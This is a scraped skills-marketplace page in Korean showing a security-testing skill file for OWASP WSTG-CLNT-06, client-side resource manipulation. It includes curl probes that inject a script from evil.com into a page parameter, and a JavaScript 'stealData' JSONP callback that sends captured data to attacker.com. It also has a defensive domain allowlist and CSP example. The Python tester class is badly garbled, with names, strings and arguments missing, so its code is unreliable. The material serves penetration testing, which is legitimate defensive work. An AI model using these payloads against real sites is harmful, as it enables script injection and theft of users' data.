소스 정보
- 저장소
- CyberStrikeus/CyberStrike
- 최근 소스 활동
- 2026년 4월 28일 23:54
- 감지된 SKILL.md 언어
- 영어
- 스타
- 1,653
- 포크
- 254
설치 방법
기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.
소스 파일 검토
설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.
메뉴
기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.
설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
직접 명령은 검토 Prompt를 거치지 않습니다. 실행하기 전에 소스를 확인하세요.
npx skills add https://github.com/CyberStrikeus/CyberStrike --skill wstg-clnt-06명령은 한 줄로 유지됩니다. 복사하기 전에 가로로 스크롤해 전체 내용을 확인하세요.
로컬 사본을 원하시나요? SkillsMP에서 현재 제공할 수 있는 파일을 다운로드하세요.
SOC 직업 분류 기준
SKILL.md 표시 중
| name | wstg-clnt-06 |
| description | Testing for Client-Side Resource Manipulation |
| category | client-side |
| owasp_id | WSTG-CLNT-06 |
| version | 1.0.0 |
| author | cyberstrike-official |
| tags | ["client-side","javascript","dom","cors","wstg","clnt"] |
| tech_stack | [] |
| cwe_ids | ["CWE-200"] |
| chains_with | [] |
| prerequisites | [] |
| severity_boost | {} |
WSTG-CLNT-06
Testing for Client-Side Resource Manipulation
Client-side resource manipulation occurs when attackers can control what resources (scripts, styles, images) a page loads. This can lead to loading malicious scripts, defacement, or data theft by manipulating URLs of external resources.
#!/bin/bash
TARGET="https://target.com"
# Check if script sources can be manipulated
curl -s "$TARGET/page?script=https://evil.com/malicious.js" | grep -i "script.*src"
curl -s "$TARGET/page?callback=alert" | grep -i "callback"
// If JSONP callback can be controlled:
// https://target.com/api/data?callback=stealData
function stealData(data) {
// Send data to attacker
fetch("https://attacker.com/log?data=" + JSON.stringify(data))
}
#!/usr/bin/env python3
import requests
import re
class ResourceManipulationTester:
():
.base_url = base_url
.findings = []
():
()
payload =
response = requests.get(
,
params={param: payload}
)
response.text response.text:
()
.findings.append({
: ,
:
})
():
()
response = requests.get(
,
params={: }
)
response.text:
()
.findings.append({
: ,
:
})
tester = ResourceManipulationTester()
tester.test_script_injection(, )
tester.test_jsonp()
// Validate resource URLs
const ALLOWED_DOMAINS = ["cdn.example.com", "static.example.com"]
function loadScript(url) {
try {
const parsed = new URL(url)
if (ALLOWED_DOMAINS.includes(parsed.hostname)) {
const script = document.createElement("script")
script.src = url
document.body.appendChild(script)
}
} catch (e) {
console.error("Invalid URL")
}
}
// Use CSP to restrict resource loading
// Content-Security-Policy: script-src 'self' cdn.example.com
| Finding | CVSS | Severity |
|---|---|---|
| External script loading | 8.6 | High |
| JSONP callback manipulation | 6.1 | Medium |
[ ] Script sources analyzed
[ ] JSONP endpoints tested
[ ] iframe sources checked
[ ] CSS sources tested
[ ] Findings documented